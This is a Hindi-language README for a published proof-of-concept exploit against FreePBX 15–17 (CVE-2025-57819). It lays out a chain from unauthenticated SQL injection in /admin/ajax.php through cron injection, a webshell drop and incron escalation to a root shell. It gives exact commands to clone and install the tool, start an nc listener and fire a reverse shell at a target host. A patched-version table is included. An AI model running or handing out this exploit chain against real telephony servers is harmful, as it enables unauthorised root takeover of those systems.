
CVE-2025-57819 के लिए पूर्ण-श्रृंखला PoC, FreePBX 15, 16 और 17 के लिए: बिना प्रमाणीकरण के SQLi से RCE और रूट अधिग्रहण।
CVE-2025-57819 के लिए पूर्ण-श्रृंखला PoC। FreePBX के एंडपॉइंट मॉड्यूल में अप्रमाणित त्रुटि-आधारित SQL इंजेक्शन, क्रॉन जॉब इंजेक्शन और इनक्रोन विशेषाधिकार वृद्धि के माध्यम से रूट शेल में बदल जाता है।
केवल अधिकृत परीक्षण और अनुसंधान के लिए। उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं।
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
/admin/ajax.php पर त्रुटि-आधारित इंजेक्शन के माध्यम से DB जानकारी निकालता हैasterisk के रूप में RCE की पुष्टि करता हैfwconsole हुक को फायर करता हैgit clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]
पहले एक लिसनर शुरू करें:
nc -lvnp 9999
फिर चलाएँ:
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
--cleanup शोषण के बाद वेबशेल और क्रॉन जॉब को हटा देता है।
FreePBX जिसमें endpoint मॉड्यूल स्थापित है। /admin/ajax.php में brand पैरामीटर SQL क्वेरी में असंसोधित रूप से पारित किया जाता है।
| FreePBX | पैच किया गया संस्करण |
|---|---|
| 15.x | 15.0.66 |
| 16.x | 16.0.89 |
| 17.x | 17.0.3 |
ozcanpng — github.com/ozcanpng — ozcanpng.dev